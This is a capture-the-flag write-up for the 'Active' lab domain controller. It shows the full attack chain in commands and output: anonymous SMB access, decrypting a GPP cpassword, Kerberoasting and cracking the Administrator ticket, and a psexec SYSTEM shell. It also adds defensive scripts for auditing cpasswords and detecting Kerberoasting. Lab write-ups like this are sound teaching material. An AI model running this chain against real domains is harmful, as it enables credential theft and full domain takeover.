Active
- OS: Windows
- Difficulty: Easy
- IP Address: 10.10.10.100
- Release: 28 / 07 / 2018
Port scanning
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.100 -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182
Nmap scan report for 10.10.10.100
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: )
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 12m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date:
|_ start_date:
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 71.22 seconds
This machine has ports 53 (DNS), 88 (Kerberos), 135 (MS-RPC), 389 (LDAP) and 445 (SMB) open, among others.
$ crackmapexec smb 10.10.10.100
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
Moreover, we see that the machine is a domain controller (DC) of an Active Directory (AD) environment. We can start by adding active.htb to /etc/hosts.
Enumeration
Using smbmap and a null session, we can enumerate SMB shares:
$ smbmap -H 10.10.10.100 -u '' -p '' --no-banner
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
As shown, we have read access to a share called Replication. We can download all of its files using smbclient as follows:
$ smbclient \\\\10.10.10.100\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5725771 blocks available
smb: \> cd active.htb
smb: \active.htb\> recurse ON
smb: \active.htb\> prompt OFF
smb: \active.htb\> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.3 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (7.7 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (1.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.0 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (10.4 KiloBytes/sec) (average 3.2 KiloBytes/sec)
Now we have got these files from the machine:
$ tree active.htb
active.htb
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
21 directories, 7 files
Decrypting a password from Groups.xml
There is a file called Groups.xml. This is a Group Policy Preferences (GPP) file, used to configure users and groups through domain group policy. The file looks like this:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS" />
</User>
</Groups>
There is a user called SVC_TGS. The user's password is encrypted in a property called cpassword. However, we are able to decrypt it because Microsoft published the AES key used by the algorithm (more information here). The decryption can be done using gpp-decrypt:
$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
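As an added example (not part of the original writeup and not the code of gpp-decrypt), the following Python script does what a defender auditing SYSVOL would do: it parses a GPP XML file for any cpassword attribute, reports the account it belongs to, and decrypts the value with the AES-256 key Microsoft published in the MS-GPPREF specification. The sample XML is constructed from the Groups.xml shown above; decryption uses the third-party cryptography package and is skipped (returns None) when that package is not installed.

```python
"""Audit Group Policy Preferences XML for cpassword values and decrypt them.

Added example, not part of the original writeup. The audit step uses only the
standard library; the decrypt step uses the `cryptography` package when it is
installed and otherwise reports that decryption was skipped.
"""
import base64
import xml.etree.ElementTree as ET

# AES-256 key published by Microsoft in MS-GPPREF (section "Password Encryption").
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

# Constructed sample modelled on the Groups.xml found on the machine; the
# cpassword value is the one shown in the writeup.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS" />
  </User>
</Groups>
"""


def find_cpasswords(xml_text):
    """Return (element_tag, account_name, cpassword) for every non-empty cpassword attribute."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    hits = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if cpw:  # an empty cpassword means no password was stored
            # Groups.xml keeps the account on the Properties element (userName);
            # other GPP files (Services, ScheduledTasks, ...) use name/accountName.
            account = elem.get("userName") or elem.get("accountName") or elem.get("name") or "<unknown>"
            hits.append((elem.tag, account, cpw))
    return hits


def decrypt_cpassword(cpassword):
    """Decrypt a cpassword value; returns None when the cryptography package is missing."""
    # GPP strips the trailing '=' padding from the base64 text; restore it first.
    padded = cpassword + "=" * (-len(cpassword) % 4)
    ciphertext = base64.b64decode(padded)
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    # AES-256-CBC with an all-zero IV, as specified by MS-GPPREF.
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    plaintext = decryptor.update(ciphertext) + decryptor.finalize()
    # Remove PKCS#7 padding, then decode the UTF-16LE wide string Windows stored.
    pad_len = plaintext[-1]
    return plaintext[:-pad_len].decode("utf-16-le")


def audit(xml_text):
    """Return one report dict per stored cpassword, with the decrypted value when possible."""
    return [
        {"element": tag, "account": account, "cpassword": cpw, "plaintext": decrypt_cpassword(cpw)}
        for tag, account, cpw in find_cpasswords(xml_text)
    ]


if __name__ == "__main__":
    for entry in audit(SAMPLE_GROUPS_XML):
        shown = entry["plaintext"] if entry["plaintext"] is not None else "<cryptography not installed>"
        print(f"{entry['element']}: {entry['account']} -> {shown}")
```

Run the audit over every XML file under the Policies directory of a SYSVOL copy. The MS14-025 update stopped the Group Policy editor from saving new cpassword values, but it does not remove values that already exist, which is why the check is still worth running.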
Now let's check with crackmapexec that the credentials are valid:
$ crackmapexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
More SMB enumeration
Now that we have valid credentials, we can check if we have more permissions in SMB:
$ smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 --no-banner
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
We can read files from the Users share, so let's see if we can find the user.txt flag inside:
$ smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> dir
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt A 34 Sat Jul 21 11:06:25 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
And here we have it:
$ cat user.txt
86d67d8ba232bb6a254aa4d10159e983
Privilege escalation
Moreover, with a valid username we could perform an AS-REP Roasting attack. But since we also have valid credentials, we can perform a Kerberoasting attack.
Kerberoasting attack
This attack consists of requesting a service ticket (TGS) for an account that has a Service Principal Name (SPN) and cracking the ticket offline to recover that account's password (if it is weak), since part of the ticket is encrypted with a key derived from the password.
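From the defender's side, each service ticket request is logged on the DC as Security event 4769; a ticket issued with RC4 (TicketEncryptionType 0x17, the same etype 23 that appears in the $krb5tgs$23$ hash later on this page) for a user account's SPN is the usual Kerberoasting signature. The following Python is an added example, not part of the original writeup: it runs that check over a few constructed 4769 records (the events, account names and addresses are made up to mirror the real event's field names) and groups hits by requesting account and source address.

```python
"""Flag Kerberoasting-style service-ticket requests in Windows Security event 4769 records.

Added example, not part of the original writeup. SAMPLE_EVENTS is constructed,
not captured from the machine; the field names (TargetUserName, ServiceName,
TicketEncryptionType, IpAddress, Status) are those of a real 4769 event.
"""

# Ticket encryption types as logged in TicketEncryptionType (RFC 3961 numbers, hex).
ETYPE_NAMES = {
    "0x1": "des-cbc-crc",
    "0x3": "des-cbc-md5",
    "0x11": "aes128-cts-hmac-sha1-96",
    "0x12": "aes256-cts-hmac-sha1-96",
    "0x17": "rc4-hmac",
    "0x18": "rc4-hmac-exp",
}
WEAK_ETYPES = {"0x1", "0x3", "0x17", "0x18"}

# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    # Ordinary traffic: AES ticket for a computer account's service.
    {"EventID": 4769, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
    # A ticket for krbtgt is the KDC's own service and is not a roasting target.
    {"EventID": 4769, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
    # RC4 ticket for a user account that carries an SPN: the Kerberoasting pattern.
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    # Failed request (0x7 = KDC_ERR_S_PRINCIPAL_UNKNOWN): no ticket was issued.
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "nosuchsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x7"},
]


def is_suspicious_tgs_request(event):
    """True for a successfully issued RC4/DES service ticket for a non-computer, non-krbtgt service."""
    if event.get("EventID") != 4769 or event.get("Status") != "0x0":
        return False
    etype = event.get("TicketEncryptionType", "").lower()
    if etype not in WEAK_ETYPES:
        return False  # AES ticket: nothing a wordlist attack can crack cheaply
    service = event.get("ServiceName", "")
    if service.endswith("$") or service.lower().startswith("krbtgt"):
        return False  # computer accounts have random 120+ char passwords; krbtgt is the KDC
    return True


def kerberoast_alerts(events, threshold=1):
    """Group suspicious requests by (requesting account, source IP); keep groups at/above threshold."""
    groups = {}
    for ev in events:
        if is_suspicious_tgs_request(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            groups.setdefault(key, []).append(ev["ServiceName"])
    return {key: services for key, services in groups.items() if len(services) >= threshold}


if __name__ == "__main__":
    for (account, source), services in kerberoast_alerts(SAMPLE_EVENTS).items():
        print(f"{account} from {source} requested RC4/DES tickets for: {', '.join(services)}")
```

In a real environment, raise the threshold and add a time window: a single RC4 ticket can be legitimate where old applications still negotiate RC4, while one account requesting tickets for many SPN-bearing user accounts within seconds is what GetUserSPNs produces. The underlying weakness is removed by giving SPN accounts long random passwords (or using group managed service accounts) and restricting them to AES via msDS-SupportedEncryptionTypes.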
To set up the attack, first we need to synchronize our clock with the DC (using rdate or ntpdate), because Kerberos rejects requests whose timestamp differs from the KDC's by more than 5 minutes by default (nmap reported a clock skew of 12m57s above):
# rdate -n 10.10.10.100
And then we can check if there is any “kerberoastable” user:
$ impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2022-11-10 00:50:33.067749
The user Administrator is "kerberoastable", so let's request its TGS:
$ impacket-GetUserSPNs -dc-ip 10.10.10.100 -request-user Administrator active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2022-11-10 00:50:33.067749
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$04bbe44c152d9356071dc6ca96daa99f$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
Using john and rockyou.txt, we can try to crack the hash:
$ echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$04bbe44c152d9356071dc6ca96daa99f$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' > hash
$ john --wordlist=$WORDLISTS/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:10 DONE 0.09718g/s 1024Kp/s 1024Kc/s 1024KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And the password is weak, so we have access as Administrator. To get into the machine, we can use impacket-psexec and capture the root.txt flag:
$ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file UBsxELyA.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service WvVb on 10.10.10.100.....
[*] Starting service WvVb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
87ad1f1ec59362d0537d15ce706b3229